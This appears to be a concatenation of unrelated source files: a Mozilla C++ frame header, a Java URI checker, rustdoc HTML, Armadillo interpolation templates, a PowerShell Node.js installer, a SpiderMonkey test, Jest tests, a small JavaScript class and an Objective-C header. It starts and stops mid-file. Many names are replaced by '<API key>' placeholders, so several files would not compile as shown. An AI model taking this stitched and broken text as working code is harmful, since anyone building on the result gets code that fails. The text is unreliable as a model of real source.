    return nsContainerFrame::IsFrameOfType(aFlags &
      ~(nsIFrame::eReplaced | nsIFrame::<API key>));
  }

  // nsIFormControlFrame
  virtual void SetFocus(bool aOn, bool aRepaint) override;
  virtual nsresult SetFormProperty(nsIAtom* aName, const nsAString& aValue) override;

  /**
   * This method attempts to localizes aValue and then sets the result as the
   * value of our anonymous text control. It's called when our
   * HTMLInputElement's value changes, when we need to sync up the value
   * displayed in our anonymous text control.
   */
  void <API key>(const nsAString& aValue);

  /**
   * This method gets the string value of our anonymous text control,
   * attempts to normalizes (de-localizes) it, then sets the outparam aValue to
   * the result. It's called when user input changes the text value of our
   * anonymous text control so that we can sync up the internal value of our
   * HTMLInputElement.
   */
  void <API key>(nsAString& aValue);

  bool <API key>();

  /**
   * Called to notify this frame that its HTMLInputElement is currently
   * processing a DOM 'input' event.
   */
  void HandlingInputEvent(bool aHandlingEvent)
  {
    mHandlingInputEvent = aHandlingEvent;
  }

  HTMLInputElement* GetAnonTextControl();

  /**
   * If the frame is the frame for an <API key>'s anonymous text
   * field, returns the <API key>. Else returns nullptr.
   */
  static <API key>* <API key>(nsIFrame* aFrame);

  /**
   * If the frame is the frame for an <API key>'s up or down spin
   * button, returns the <API key>. Else returns nullptr.
   */
  static <API key>* <API key>(nsIFrame* aFrame);

  // Identifies which spin button (if any) a pointer event hit.
  enum SpinButtonEnum {
    eSpinButtonNone,
    eSpinButtonUp,
    eSpinButtonDown
  };

  /**
   * Returns one of the SpinButtonEnum values to depending on whether the
   * pointer event is over the spin-up button, the spin-down button, or
   * neither.
   */
  int32_t <API key>(WidgetGUIEvent* aEvent) const;

  void SpinnerStateChanged() const;

  bool <API key>() const;

  bool <API key>() const;

  bool IsFocused() const;

  void HandleFocusEvent(WidgetEvent* aEvent);

  /**
   * Our element had HTMLInputElement::Select() called on it.
   */
  nsresult HandleSelectCall();

  virtual Element* GetPseudoElement(<API key> aType) override;

  bool <API key>() const;

private:
  nsITextControlFrame* GetTextFieldFrame();

  // Helper used to create one piece of the anonymous content tree
  // (outparam aResult) with the given tag, pseudo type and parent style.
  nsresult <API key>(Element** aResult,
                     nsTArray<ContentInfo>& aElements,
                     nsIAtom* aTagName,
                     <API key> aPseudoType,
                     nsStyleContext* aParentContext);

  class <API key>;
  friend class <API key>;

  // Runnable that re-syncs the disabled state of the anonymous children
  // asynchronously; holds the frame weakly so it is safe if the frame is
  // destroyed before the runnable fires.
  class <API key> : public mozilla::Runnable
  {
  public:
    explicit <API key>(<API key>* aFrame)
      : mFrame(aFrame)
    {}

    NS_IMETHOD Run() override
    {
      <API key>* frame =
        static_cast<<API key>*>(mFrame.GetFrame());
      NS_ENSURE_STATE(frame);
      frame->SyncDisabledState();
      return NS_OK;
    }

  private:
    nsWeakFrame mFrame;
  };

  /**
   * Sync the disabled state of the anonymous children up with our content's.
   */
  void SyncDisabledState();

  /**
   * The text field used to edit and show the number.
   * @see <API key>::<API key>.
   */
  nsCOMPtr<Element> mOuterWrapper;
  nsCOMPtr<Element> mTextField;
  nsCOMPtr<Element> mSpinBox;
  nsCOMPtr<Element> mSpinUp;
  nsCOMPtr<Element> mSpinDown;
  // True while our HTMLInputElement is dispatching a DOM 'input' event.
  bool mHandlingInputEvent;
};
#endif // <API key> |
package org.echocat.jomon.net.service;
import org.echocat.jomon.runtime.util.<API key>;
import javax.annotation.Nonnegative;
import javax.annotation.Nonnull;
import javax.annotation.Nullable;
import java.net.InetSocketAddress;
import java.net.URI;
import java.net.<API key>;
import static java.net.InetAddress.getByName;
import static java.net.InetSocketAddress.createUnresolved;
import static org.apache.commons.lang3.StringUtils.isNotEmpty;
import static org.echocat.jomon.net.Protocol.tcp;
/**
 * Base class for TCP service-URI checkers: resolves the host of each input
 * {@link URI}, lets a subclass probe the resolved address, and rewrites the
 * URI so that it points at the resolved host/port.
 */
public abstract class <API key> extends <API key><URI, URI> {

    protected <API key>(@Nonnull String service) {
        super(tcp, service);
        <API key>("CheckServiceUris for " + getService() + "@" + getProtocol().getName());
    }

    /**
     * Resolves the host of {@code input} to an {@link InetSocketAddress}.
     * Falls back to an unresolved address if DNS resolution fails, so that
     * the caller can retry later.
     */
    @Nullable
    @Override
    protected InetSocketAddress toInetSocketAddress(@Nonnull URI input) throws Exception {
        final String host = input.getHost();
        if (host == null) {
            // Fixed typo in message: was "No host fond in".
            throw new <API key>("No host found in: " + input);
        }
        final int port = getPortFor(input);
        InetSocketAddress result;
        try {
            result = new InetSocketAddress(getByName(host), port);
        } catch (final <API key> ignored) {
            // Resolution failed: keep the literal host so another attempt
            // can be made once DNS recovers.
            result = createUnresolved(host, port);
        }
        return result;
    }

    /**
     * Returns the explicit port of {@code input}, or the scheme default
     * (80 for http, 443 for https). Other schemes without an explicit port
     * are rejected.
     */
    @Nonnegative
    protected int getPortFor(@Nonnull URI input) throws Exception {
        int port = input.getPort();
        if (port < 0) {
            final String scheme = input.getScheme();
            if ("http".equals(scheme)) {
                port = 80;
            } else if ("https".equals(scheme)) {
                port = 443;
            } else {
                throw new <API key>("No port found in: " + input);
            }
        }
        return port;
    }

    @Override
    protected URI tryGetOutputFor(@Nonnull URI input, @Nonnull InetSocketAddress address, @Nonnull State oldState) throws Exception {
        final URI uri = toUri(input, address);
        checkUri(uri, oldState);
        return uri;
    }

    /**
     * @throws Exception will cause the whole process to stop. This exception is not acceptable.
     * @throws <API key> will cause that this uri is marked as unavailable. Another try will follow.
     */
    @SuppressWarnings("DuplicateThrows")
    protected abstract void checkUri(@Nonnull URI uri, @Nonnull State oldState) throws Exception, <API key>;

    /**
     * Rebuilds {@code original} with its host/port replaced by the resolved
     * {@code address}, preserving user-info, path, query and fragment.
     */
    @Nonnull
    protected URI toUri(@Nonnull URI original, @Nonnull InetSocketAddress address) {
        final String scheme = original.getScheme();
        final int port = address.getPort();
        final String userInfo = original.getRawUserInfo();
        final String path = original.getRawPath();
        final String query = original.getRawQuery();
        final String fragment = original.getRawFragment();
        final StringBuilder sb = new StringBuilder();
        // Restored corrupted line: the authority separator must follow the scheme.
        sb.append(scheme).append("://");
        if (isNotEmpty(userInfo)) {
            sb.append(userInfo).append('@');
        }
        sb.append(address.getHostString());
        if (canAppendPort(scheme, port)) {
            sb.append(':').append(port);
        }
        if (isNotEmpty(path)) {
            sb.append(path);
        }
        if (isNotEmpty(query)) {
            sb.append('?').append(query);
        }
        if (isNotEmpty(fragment)) {
            sb.append('#').append(fragment);
        }
        return URI.create(sb.toString());
    }

    /**
     * Only append the port when it differs from the scheme default,
     * keeping the rebuilt URI canonical.
     */
    protected boolean canAppendPort(@Nonnull String scheme, int port) {
        return ("http".equals(scheme) && port != 80) || ("https".equals(scheme) && port != 443);
    }
}
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `load_with` fn in crate `gleam`.">
<meta name="keywords" content="rust, rustlang, rust-lang, load_with">
<title>gleam::ffi::Ortho::load_with - Rust</title>
<link rel="stylesheet" type="text/css" href="../../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]-->
<section class="sidebar">
<p class='location'><a href='../../index.html'>gleam</a>::<wbr><a href='../index.html'>ffi</a>::<wbr><a href='index.html'>Ortho</a></p><script>window.sidebarCurrent = {name: 'load_with', ty: 'fn', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</section>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content fn">
<h1 class='fqn'><span class='in-band'>Function <a href='../../index.html'>gleam</a>::<wbr><a href='../index.html'>ffi</a>::<wbr><a href='index.html'>Ortho</a>::<wbr><a class='fn' href=''>load_with</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-44081' class='srclink' href='../../../src/gleam///home/servo/buildbot/slave/doc/build/target/debug/build/<API key>/out/gl_bindings.rs.html#14449-14453' title='goto source code'>[src]</a></span></h1>
<pre class='rust fn'>pub fn load_with<F>(loadfn: F) <span class='where'>where F: <a class='trait' href='../../../core/ops/trait.FnMut.html' title='core::ops::FnMut'>FnMut</a>(&<a href='../../../std/primitive.str.html'>str</a>) -> <a href='../../../std/primitive.pointer.html'>*const <a class='enum' href='../../../libc/types/common/c95/enum.c_void.html' title='libc::types::common::c95::c_void'>c_void</a></a></span></pre></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<div id="help" class="hidden">
<div>
<div class="shortcuts">
<h1>Keyboard Shortcuts</h1>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
</dl>
</div>
<div class="infos">
<h1>Search Tricks</h1>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code>)
</p>
</div>
</div>
</div>
<script>
window.rootPath = "../../../";
window.currentCrate = "gleam";
window.playgroundUrl = "";
</script>
<script src="../../../jquery.js"></script>
<script src="../../../main.js"></script>
<script async src="../../../search-index.js"></script>
</body>
</html> |
// This Source Code Form is subject to the terms of the Mozilla Public
//! \addtogroup fn_interp1
//! Nearest-neighbour interpolation kernel for the "*nearest" method:
//! both the grid abscissae XG and the query points XI are assumed to be
//! sorted in ascending order, so the linear scan through XG can resume
//! from the previous query's optimum position instead of restarting.
template<typename eT>
inline
void
<API key>(const Mat<eT>& XG, const Mat<eT>& YG, const Mat<eT>& XI, Mat<eT>& YI)
  {
  <API key>();
  
  // queries must lie inside [XG_min, XG_max]; extrapolation is rejected below
  const eT XG_min = XG.min();
  const eT XG_max = XG.max();
  
  YI.copy_size(XI);
  
  const eT* XG_mem = XG.memptr();
  const eT* YG_mem = YG.memptr();
  const eT* XI_mem = XI.memptr();
        eT* YI_mem = YI.memptr();
  
  const uword NG = XG.n_elem;
  const uword NI = XI.n_elem;
  
  uword best_j = 0;
  
  for(uword i=0; i<NI; ++i)
    {
    eT best_err = Datum<eT>::inf;
    
    const eT XI_val = XI_mem[i];
    
    arma_debug_check( ((XI_val < XG_min) || (XI_val > XG_max)), "interp1(): extrapolation not supported" );
    
    // XG and XI are guaranteed to be sorted in ascending manner,
    // so start searching XG from last known optimum position
    for(uword j=best_j; j<NG; ++j)
      {
      const eT tmp = XG_mem[j] - XI_val;
      const eT err = (tmp >= eT(0)) ? tmp : -tmp;
      
      if(err >= best_err)
        {
        // error is going up, so we have found the optimum position
        break;
        }
      else
        {
        best_err = err;
        best_j = j;  // remember the optimum position
        }
      }
    
    // output is simply the ordinate of the closest grid point
    YI_mem[i] = YG_mem[best_j];
    }
  }
//! Linear interpolation kernel for the "*linear" method:
//! XG and XI are assumed to be sorted in ascending order. For each query
//! point the two bracketing grid points (a_best_j, b_best_j) are located
//! and their ordinates blended by inverse-distance weighting.
template<typename eT>
inline
void
<API key>(const Mat<eT>& XG, const Mat<eT>& YG, const Mat<eT>& XI, Mat<eT>& YI)
  {
  <API key>();
  
  // queries must lie inside [XG_min, XG_max]; extrapolation is rejected below
  const eT XG_min = XG.min();
  const eT XG_max = XG.max();
  
  YI.copy_size(XI);
  
  const eT* XG_mem = XG.memptr();
  const eT* YG_mem = YG.memptr();
  const eT* XI_mem = XI.memptr();
        eT* YI_mem = YI.memptr();
  
  const uword NG = XG.n_elem;
  const uword NI = XI.n_elem;
  
  uword a_best_j = 0;
  uword b_best_j = 0;
  
  for(uword i=0; i<NI; ++i)
    {
    const eT XI_val = XI_mem[i];
    
    arma_debug_check( ((XI_val < XG_min) || (XI_val > XG_max)), "interp1(): extrapolation not supported" );
    
    // XG and XI are guaranteed to be sorted in ascending manner,
    // so start searching XG from last known optimum position
    
    eT a_best_err = Datum<eT>::inf;
    eT b_best_err = Datum<eT>::inf;
    
    // first find the grid point closest to XI_val ...
    for(uword j=a_best_j; j<NG; ++j)
      {
      const eT tmp = XG_mem[j] - XI_val;
      const eT err = (tmp >= eT(0)) ? tmp : -tmp;
      
      if(err >= a_best_err)
        {
        break;
        }
      else
        {
        a_best_err = err;
        a_best_j = j;
        }
      }
    
    // ... then pick its neighbour on the opposite side of XI_val
    if( (XG_mem[a_best_j] - XI_val) <= eT(0) )
      {
      // a_best_j is to the left of the interpolated position
      b_best_j = ( (a_best_j+1) < NG) ? (a_best_j+1) : a_best_j;
      }
    else
      {
      // a_best_j is to the right of the interpolated position
      b_best_j = (a_best_j >= 1) ? (a_best_j-1) : a_best_j;
      }
    
    b_best_err = std::abs( XG_mem[b_best_j] - XI_val );
    
    // keep the bracketing pair ordered: a on the left, b on the right
    if(a_best_j > b_best_j)
      {
      std::swap(a_best_j, b_best_j );
      std::swap(a_best_err, b_best_err);
      }
    
    // inverse-distance weighting; a_best_err == 0 means XI_val coincides
    // with a grid point, in which case its ordinate is used directly
    const eT weight = (a_best_err > eT(0)) ? (a_best_err / (a_best_err + b_best_err)) : eT(0);
    
    YI_mem[i] = (eT(1) - weight)*YG_mem[a_best_j] + (weight)*YG_mem[b_best_j];
    }
  }
//! Common driver for interp1(): validates inputs, sorts X/Y and XI when
//! required by the selected method, dispatches to the matching kernel,
//! and restores the original query order in the output.
template<typename eT>
inline
void
interp1_helper(const Mat<eT>& X, const Mat<eT>& Y, const Mat<eT>& XI, Mat<eT>& YI, const uword sig)
  {
  <API key>();
  
  arma_debug_check( ((X.is_vec() == false) || (Y.is_vec() == false) || (XI.is_vec() == false)), "interp1(): currently only vectors are supported" );
  
  arma_debug_check( (X.n_elem != Y.n_elem), "interp1(): X and Y must have the same number of elements" );
  
  arma_debug_check( (X.n_elem < 2), "interp1(): X must have at least two elements" );
  
  // sig = 10: nearest neighbour
  // sig = 11: nearest neighbour, assume monotonic increase in X and XI
  // sig = 20: linear
  // sig = 21: linear, assume monotonic increase in X and XI
  
  // monotonic variants need no sorting; hand off directly
  if(sig == 11) { <API key>(X, Y, XI, YI); return; }
  if(sig == 21) { <API key> (X, Y, XI, YI); return; }
  
  // sort X (carrying Y along) if it is not already ascending
  Mat<eT> X_tmp;
  Mat<eT> Y_tmp;
  
  const bool X_is_sorted = X.is_sorted();
  
  if(X_is_sorted == false)
    {
    // stable sort keeps the relative order of equal abscissae
    const uvec X_indices = stable_sort_index(X);
    
    const uword N = X.n_elem;
    
    X_tmp.set_size(N);
    Y_tmp.set_size(N);
    
    const uword* X_indices_mem = X_indices.memptr();
    
    const eT* X_mem = X.memptr();
    const eT* Y_mem = Y.memptr();
    
    eT* X_tmp_mem = X_tmp.memptr();
    eT* Y_tmp_mem = Y_tmp.memptr();
    
    // permute X and Y in lockstep so pairs stay matched
    for(uword i=0; i<N; ++i)
      {
      const uword j = X_indices_mem[i];
      
      X_tmp_mem[i] = X_mem[j];
      Y_tmp_mem[i] = Y_mem[j];
      }
    }
  
  const Mat<eT>& X_sorted = (X_is_sorted) ? X : X_tmp;
  const Mat<eT>& Y_sorted = (X_is_sorted) ? Y : Y_tmp;
  
  // sort the query points too, remembering the permutation so the
  // results can be scattered back into the caller's order afterwards
  Mat<eT> XI_tmp;
  uvec XI_indices;
  
  const bool XI_is_sorted = XI.is_sorted();
  
  if(XI_is_sorted == false)
    {
    XI_indices = stable_sort_index(XI);
    
    const uword N = XI.n_elem;
    
    XI_tmp.copy_size(XI);
    
    const uword* XI_indices_mem = XI_indices.memptr();
    
    const eT* XI_mem = XI.memptr();
          eT* XI_tmp_mem = XI_tmp.memptr();
    
    for(uword i=0; i<N; ++i)
      {
      XI_tmp_mem[i] = XI_mem[ XI_indices_mem[i] ];
      }
    }
  
  const Mat<eT>& XI_sorted = (XI_is_sorted) ? XI : XI_tmp;
  
  // dispatch to the monotonic kernels now that everything is ascending
       if(sig == 10) { <API key>(X_sorted, Y_sorted, XI_sorted, YI); }
  else if(sig == 20) { <API key> (X_sorted, Y_sorted, XI_sorted, YI); }
  
  // undo the query-point permutation so YI lines up with the original XI
  if( (XI_is_sorted == false) && (YI.n_elem > 0) )
    {
    Mat<eT> YI_unsorted;
    
    YI_unsorted.copy_size(YI);
    
    const eT* YI_mem = YI.memptr();
          eT* YI_unsorted_mem = YI_unsorted.memptr();
    
    const uword N = XI_sorted.n_elem;
    
    const uword* XI_indices_mem = XI_indices.memptr();
    
    for(uword i=0; i<N; ++i)
      {
      YI_unsorted_mem[ XI_indices_mem[i] ] = YI_mem[i];
      }
    
    YI.steal_mem(YI_unsorted);
    }
  }
//! Public 1D interpolation entry point (real element types only).
//! Given data points (X, Y) and query abscissae XI, fills YI with the
//! interpolated values. Supported methods: "nearest", "linear", and the
//! "*nearest"/"*linear" variants which assume X and XI are already sorted
//! in ascending order.
template<typename T1, typename T2, typename T3>
inline
typename
enable_if2
  <
  is_real<typename T1::elem_type>::value,
  void
  >::result
interp1
  (
  const Base<typename T1::elem_type, T1>& X,
  const Base<typename T1::elem_type, T2>& Y,
  const Base<typename T1::elem_type, T3>& XI,
  Mat<typename T1::elem_type>& YI,
  const char* method = "linear"
  )
  {
  <API key>();
  
  typedef typename T1::elem_type eT;
  
  // decode the method string into an internal signature code;
  // only the first two characters are inspected
  uword sig = 0;
  
  if(method != NULL )
  if(method[0] != char(0))
  if(method[1] != char(0))
    {
    const char c1 = method[0];
    const char c2 = method[1];
    
         if(c1 == 'n') { sig = 10; }  // nearest neighbour
    else if(c1 == 'l') { sig = 20; }  // linear
    else
      {
      if( (c1 == '*') && (c2 == 'n') ) { sig = 11; }  // nearest neighour, assume monotonic increase in X and XI
      if( (c1 == '*') && (c2 == 'l') ) { sig = 21; }  // linear, assume monotonic increase in X and XI
      }
    }
  
  arma_debug_check( (sig == 0), "interp1(): unsupported interpolation type" );
  
  const quasi_unwrap<T1> X_tmp( X.get_ref());
  const quasi_unwrap<T2> Y_tmp( Y.get_ref());
  const quasi_unwrap<T3> XI_tmp(XI.get_ref());
  
  // if the output aliases any input, compute into a scratch matrix first
  if( X_tmp.is_alias(YI) || Y_tmp.is_alias(YI) || XI_tmp.is_alias(YI) )
    {
    Mat<eT> tmp;
    
    interp1_helper(X_tmp.M, Y_tmp.M, XI_tmp.M, tmp, sig);
    
    YI.steal_mem(tmp);
    }
  else
    {
    interp1_helper(X_tmp.M, Y_tmp.M, XI_tmp.M, YI, sig);
    }
  }
# Path where the Node.js installer MSI is downloaded to (next to this script).
$msipath = "$PSScriptRoot\node-installer.msi"

# Runs an external command with the given argument string, echoing it first,
# and blocks until the process exits.
function RunCommand ($command, $command_args) {
    Write-Host $command $command_args
    Start-Process -FilePath $command -ArgumentList $command_args -Wait -Passthru
}
# Downloads the Node.js MSI and then installs it.
function InstallNode () {
    DownloadNodeMSI
    InstallNodeMSI
}
# Downloads the pinned Node.js 12.18.4 x64 MSI to $msipath and reports how
# long the download took.
function DownloadNodeMSI () {
    $url = "https://nodejs.org/dist/v12.18.4/node-v12.18.4-x64.msi"
    $start_time = Get-Date

    Write-Output "Downloading node msi"
    Invoke-WebRequest -Uri $url -OutFile $msipath
    Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"
}
# Installs Node.js from the downloaded MSI in quiet mode, writing the MSI
# log to node_install.log in the current directory.
#
# Removed: an unused $uninstall_args variable and a stale commented-out
# reinstall block that referenced $python_home — leftovers copied from a
# Python installer script; $python_home does not exist here.
function InstallNodeMSI () {
    $install_args = "/qn /log node_install.log /i $msipath"
    RunCommand "msiexec.exe" $install_args
}
# Entry point: install Node.js, then clean up the downloaded installer.
function main () {
    InstallNode
    Remove-Item $msipath
}

main
/* -*- indent-tabs-mode: nil; js-indent-level: 2 -*- */

// Regression test for bug 406477: evaluating "function x()" via eval()
// inside a function that has both an argument named x and a block-scoped
// "let x". Harness globals below follow the SpiderMonkey js test suite
// convention (actual vs expect compared by reportCompare).
var BUGNUMBER = 406477;
var summary = 'eval of function x() in a function with an argument "x" and "let x"';
var actual = '';
var expect = '';

test();
function test()
{
  enterFunc ('test');
  printBugNumber(BUGNUMBER);
  printStatus (summary);

  // Evaluates src inside a block that shadows both the parameter x and the
  // var y with let bindings, then returns the OUTER [x, y]. The eval'd
  // function declarations must bind the outer x (parameter) and y (var),
  // not the let-shadowed ones.
  function test2(x, src)
  {
    var y = 1;
    {
      let x = 2;
      let y = 2;
      eval(src);
    }
    return [x, y];
  }

  var expect = actual = '';
  var [test_param_result, test_var_result] =
    test2(1, "function x() { }\nfunction y() { }\n");

  // Both results must be the eval'd functions, not the original 1s.
  if (typeof test_param_result != "function")
    actual += "Unexpected test_param_result value: "+uneval(test_param_result)+"\n";
  if (typeof test_var_result != "function")
    actual += "Unexpected test_var_result value: "+uneval(test_var_result)+"\n";

  reportCompare(expect, actual, summary);

  exitFunc ('test');
}
const ChainedMap = require('../src/ChainedMap');
// --- chaining and backing store ---

test('is Chainable', () => {
  const parent = { parent: true };
  const map = new ChainedMap(parent);

  // end() returns the parent passed to the constructor.
  expect(map.end()).toBe(parent);
});

test('creates a backing Map', () => {
  const map = new ChainedMap();

  expect(map.store instanceof Map).toBe(true);
});

// --- basic accessors: set / get / getOrCompute ---

test('set', () => {
  const map = new ChainedMap();

  // set() returns the instance for chaining.
  expect(map.set('a', 'alpha')).toBe(map);
  expect(map.store.get('a')).toBe('alpha');
});

test('get', () => {
  const map = new ChainedMap();

  expect(map.set('a', 'alpha')).toBe(map);
  expect(map.get('a')).toBe('alpha');
});

test('getOrCompute', () => {
  const map = new ChainedMap();

  // Missing key: the factory result is stored and returned.
  expect(map.get('a')).toBeUndefined();
  expect(map.getOrCompute('a', () => 'alpha')).toBe('alpha');
  expect(map.get('a')).toBe('alpha');
});

// --- removal: clear / delete / has ---

test('clear', () => {
  const map = new ChainedMap();

  map.set('a', 'alpha');
  map.set('b', 'beta');
  map.set('c', 'gamma');

  expect(map.store.size).toBe(3);
  expect(map.clear()).toBe(map);
  expect(map.store.size).toBe(0);
});

test('delete', () => {
  const map = new ChainedMap();

  map.set('a', 'alpha');
  map.set('b', 'beta');
  map.set('c', 'gamma');

  expect(map.delete('b')).toBe(map);
  expect(map.store.size).toBe(2);
  expect(map.store.has('b')).toBe(false);
});

test('has', () => {
  const map = new ChainedMap();

  map.set('a', 'alpha');
  map.set('b', 'beta');
  map.set('c', 'gamma');

  expect(map.has('b')).toBe(true);
  expect(map.has('d')).toBe(false);
  expect(map.has('b')).toBe(map.store.has('b'));
});

// --- bulk views: values / entries ---

test('values', () => {
  const map = new ChainedMap();

  map.set('a', 'alpha');
  map.set('b', 'beta');
  map.set('c', 'gamma');

  expect(map.values()).toStrictEqual(['alpha', 'beta', 'gamma']);
});

test('entries with values', () => {
  const map = new ChainedMap();

  map.set('a', 'alpha');
  map.set('b', 'beta');
  map.set('c', 'gamma');

  expect(map.entries()).toStrictEqual({ a: 'alpha', b: 'beta', c: 'gamma' });
});

test('entries with no values', () => {
  const map = new ChainedMap();

  // An empty map yields undefined, not an empty object.
  expect(map.entries()).toBeUndefined();
});

// --- merge: plain-object import with existing keys winning ---

test('merge with no values', () => {
  const map = new ChainedMap();
  const obj = { a: 'alpha', b: 'beta', c: 'gamma' };

  expect(map.merge(obj)).toBe(map);
  expect(map.entries()).toStrictEqual(obj);
});

test('merge with existing values', () => {
  const map = new ChainedMap();
  const obj = { a: 'alpha', b: 'beta', c: 'gamma' };

  map.set('d', 'delta');

  expect(map.merge(obj)).toBe(map);
  expect(map.entries()).toStrictEqual({
    a: 'alpha',
    b: 'beta',
    c: 'gamma',
    d: 'delta',
  });
});

test('merge with overriding values', () => {
  const map = new ChainedMap();
  const obj = { a: 'alpha', b: 'beta', c: 'gamma' };

  // A pre-existing key is replaced by the merged object's value.
  map.set('b', 'delta');

  expect(map.merge(obj)).toBe(map);
  expect(map.entries()).toStrictEqual({ a: 'alpha', b: 'beta', c: 'gamma' });
});

test('merge with omitting keys', () => {
  const map = new ChainedMap();
  const obj = { a: 'alpha', b: 'beta', c: 'gamma' };

  // Second argument lists keys to skip during the merge.
  map.merge(obj, ['b']);

  expect(map.entries()).toStrictEqual({ a: 'alpha', c: 'gamma' });
});

// --- when: conditional configuration ---

test('when true', () => {
  const map = new ChainedMap();
  const right = (instance) => {
    expect(instance).toBe(map);
    instance.set('alpha', 'a');
  };
  const left = (instance) => {
    instance.set('beta', 'b');
  };

  // Truthy condition runs only the first callback.
  expect(map.when(true, right, left)).toBe(map);
  expect(map.has('alpha')).toBe(true);
  expect(map.has('beta')).toBe(false);
});

test('when false', () => {
  const map = new ChainedMap();
  const right = (instance) => {
    instance.set('alpha', 'a');
  };
  const left = (instance) => {
    expect(instance).toBe(map);
    instance.set('beta', 'b');
  };

  // Falsy condition runs only the second callback.
  expect(map.when(false, right, left)).toBe(map);
  expect(map.has('alpha')).toBe(false);
  expect(map.has('beta')).toBe(true);
});

// --- clean: strips undefined values and empty collections ---

test('clean undefined', () => {
  const map = new ChainedMap();

  map.set('alpha', undefined);
  map.set('beta', 'b');

  expect('alpha' in map.entries()).toBe(true);
  expect('alpha' in map.clean(map.entries())).toBe(false);
  expect('beta' in map.clean(map.entries())).toBe(true);
});

test('clean empty array', () => {
  const map = new ChainedMap();

  map.set('alpha', []);

  expect('alpha' in map.entries()).toBe(true);
  expect('alpha' in map.clean(map.entries())).toBe(false);
});

test('clean empty object', () => {
  const map = new ChainedMap();

  map.set('alpha', {});

  expect('alpha' in map.entries()).toBe(true);
  expect('alpha' in map.clean(map.entries())).toBe(false);
});
// Extends the OHMS namespace with FileUploadAnswer, an Answer subtype
// backed by an <input type='file'> element.
var OHMS = (function(OHMS) {

  // `data` is the server-provided answer descriptor. The base OHMS.Answer
  // constructor is applied last, with the same arguments, so base
  // initialisation runs after these fields are set.
  var FileUploadAnswer = function(question, data) {
    this.text = data.text;
    this.max_pts = data.max_pts;
    this.solution = data.solution;
    OHMS.Answer.apply(this, arguments);
  }

  FileUploadAnswer.prototype = new OHMS.Answer();

  // Returns the raw DOM <input> node backing the jQuery-wrapped element.
  FileUploadAnswer.prototype.get_file = function () {
    return this.element.get(0);
  }

  FileUploadAnswer.prototype.create_element = function () {
    /* this.element = $("<div class='Answer'/>");
       this.element.append("<input type='file' class='file'/>");
    */
    this.element = $("<input type='file' class='Answer'/>");
  }

  // File uploads have no displayable solution; drop the element.
  // NOTE(review): get_value() would throw after this sets element to null —
  // presumably show_solution and get_value are never both used; confirm.
  FileUploadAnswer.prototype.show_solution = function () {
    this.element = null;
  }

  // Intentionally a no-op: a file input's value cannot be set from script.
  FileUploadAnswer.prototype.set_value = function () {
  }

  // Returns the first selected File (undefined if none selected).
  FileUploadAnswer.prototype.get_value = function () {
    return this.get_file().files[0]
  }

  OHMS.FileUploadAnswer = FileUploadAnswer;

  return OHMS;

}(OHMS))
#import <Cocoa/Cocoa.h>
#import "DKDrawableObject.h"
<API key>
@class DKDrawableShape;
@class DKKnob;
//! editing modes: how mouse interaction creates or edits the path
//! (names redacted; semantics taken from the per-value comments)
typedef NS_ENUM(NSInteger, <API key>) {
	<API key> = 0, //!< normal operation - just move points on the existing path
	<API key> = 1, //!< create a straight line between two points
	<API key> = 2, //!< create a curved path point by point
	<API key> = 3, //!< create an irreglar polygon pont by point (multiple lines)
	<API key> = 4, //!< create a curve path by dragging freehand
	<API key> = 5, //!< create an arc section
	<API key> = 6 //!< create a wedge section
};
//! NOTE(review): names redacted; kDKPathNoJoin and the use of this style of
//! type as the return of wouldJoin:tolerance: below suggest these values
//! describe which end(s) of two paths would be joined — confirm.
typedef NS_ENUM(NSInteger, <API key>) {
	kDKPathNoJoin = 0,
	<API key> = 1,
	<API key> = 2,
	<API key> = 3
};
//! path point types that can be passed to pathInsertPointAt:ofType:
//! (names redacted; semantics taken from the per-value comments)
typedef NS_ENUM(NSInteger, <API key>) {
	<API key> = 0, //!< insert whatever the hit element is already using
	<API key> = 1, //!< insert a line segment
	<API key> = 2, //!< insert a curve segment
	<API key> = 3, //!< insert the opposite of whatever hit element is already using
};
// the class:
/** @brief DKDrawablePath is a drawable object that renders a path such as a line or curve (bezigon).
\c DKDrawablePath is a drawable object that renders a path such as a line or curve (bezigon).
The path is rendered at its stored size, not transformed to its final size like DKDrawableShape. Thus this type of object doesn't
maintain the concept of rotation or scale - it just is what it is.
*/
@interface DKDrawablePath : DKDrawableObject <NSCoding, NSCopying, <API key>> {
@private
NSBezierPath* m_path;
NSBezierPath* m_undoPath;
<API key> m_editPathMode;
CGFloat m_freehandEpsilon;
BOOL m_extending;
}
// convenience constructors:
/** @brief Creates a drawable path object for an existing NSBezierPath
Convenience method allows you to turn any path into a drawable that can be added to a drawing
@param path the path to use
@return a new drawable path object which has the path supplied
*/
+ (instancetype)<API key>:(NSBezierPath*)path;
/** @brief Creates a drawable path object for an existing NSBezierPath and style
Convenience method allows you to turn any path into a drawable that can be added to a drawing
@param path the path to use
@param aStyle a style to apply to the path
@return a new drawable path object which has the path supplied
*/
+ (instancetype)<API key>:(NSBezierPath*)path withStyle:(DKStyle*)aStyle;
// colour for feedback window:
/** @brief The background colour to use for the info window displayed when interacting with paths
*/
@property (class, retain) NSColor* <API key>;
/** @brief Set whether the default hit-detection behaviour is to prioritise on-path points or off-path points
